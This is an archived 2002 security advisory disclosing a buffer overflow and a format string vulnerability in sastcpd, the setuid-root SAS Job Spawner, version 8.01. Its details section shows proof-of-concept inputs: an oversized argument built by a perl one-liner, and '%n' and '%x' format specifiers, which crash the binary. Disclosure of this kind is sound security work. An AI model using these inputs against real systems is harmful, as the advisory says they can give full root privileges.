---------------------------------------------------------- sastcpd Buffer Overflow and Format String Vulnerabilities Ministry-of-Peace - www.ministryofpeace.co.uk ---------------------------------------------------------- SYNOPSIS "SAS software provides the foundation, tools, and solutions for data analysis, report generation, and enterprise-wide information delivery." The "SAS Job Spawner", sastcpd, contains both a buffer overflow and a format string vulnerability. SAS Support say that these problems were fixed in version 8.2 of this product, but we are unable to confirm as we do not have access to this version. IMPACT sastcpd is installed setuid root by default, and therefore full root privileges can be obtained through exploitation of either of these vulnerabilities. DETAILS Version tested: SAS Job Spawner for Open Systems version 8.01 $ sastcpd `perl -e "print 'A' x 1200"` Invalid argument: AAAA[..cut..]AAAA. Segmentation fault (core dumped) $ ls -la core -rw------- 1 root teknix 1454382 Jan 28 04:22 core $ sastcpd %n Segmentation fault (core dumped) $ sastcpd %x Invalid argument: 2. CREDITS Vulnerability discovered by Digital Shadow INFO Security Advisory #05 Published: 29th January 2002 -- _______________________________________________ Sign-up for your own FREE Personalized E-mail at Mail.com http://www.mail.com/?sr=signup Win a ski trip! http://www.nowcode.com/register.asp?affiliate=1net2phone3a
This archive was generated by hypermail 2b30 : Tue Jan 29 2002 - 11:30:25 PST